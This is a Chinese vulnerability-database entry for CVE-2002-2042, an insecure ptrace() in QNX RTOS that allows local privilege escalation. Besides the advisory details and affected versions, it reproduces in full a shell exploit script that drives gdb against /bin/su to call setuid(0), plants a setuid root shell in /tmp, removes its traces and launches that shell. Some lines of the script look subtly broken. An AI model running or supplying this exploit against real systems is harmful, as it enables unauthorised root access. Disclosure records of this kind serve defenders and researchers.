QNX 'ptrace()'任意进程修改漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106772 漏洞类型 设计错误
发布时间 2002-06-03 更新时间 2008-09-24
CVE编号 CVE-2002-2042 CNNVD-ID CNNVD-200212-080
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/21507
https://www.securityfocus.com/bid/4919
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-080
|漏洞详情
QNX实时操作系统(RTOS)4.25和6.1.0版本的程序附在享有特权的进程上。本地用户可以通过修改运行进程执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/4919/info

The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges.

This issue affects QNX RTOS 6 prior to 6.4.0. 

#!/bin/sh

#include <std_shouts.h>
#include <std_disclaimer.h>
#http://www.badc0ded.com 

echo "#!/bin/sh" > /tmp/runme
echo cp /bin/sh /tmp/sh > /tmp/runme
echo chmod 4755 /tmp/sh >> /tmp/runme
chmod 755 /tmp/runme
echo r root -c /tmp/runme > /tmp/badc0ded
echo break *main+44 >> /tmp/badc0ded
echo c >> /tmp/badc0ded
echo "call setuid(0)" >> /tmp/badc0ded
echo c >> /tmp/badc0ded
gdb /bin/su  < badc0ded > /dev/null
echo "www.badc0ded.com"
sleep 1
rm /tmp/runme /tmp/badc0ded
/tmp/sh
|受影响的产品
QNX RTOS 6.3.2 QNX RTOS 6.3 QNX RTOS 6.2.1 QNX RTOS 6.2 Update Patch A QNX RTOS 6.2 QNX RTOS 6.1 QNX RTOS 6.3.0 SP3
|参考资料

来源:BID
名称:4919
链接:http://www.securityfocus.com/bid/4919
来源:XF
名称:qnx-rtos-process-modification(9260)
链接:http://www.iss.net/security_center/static/9260.php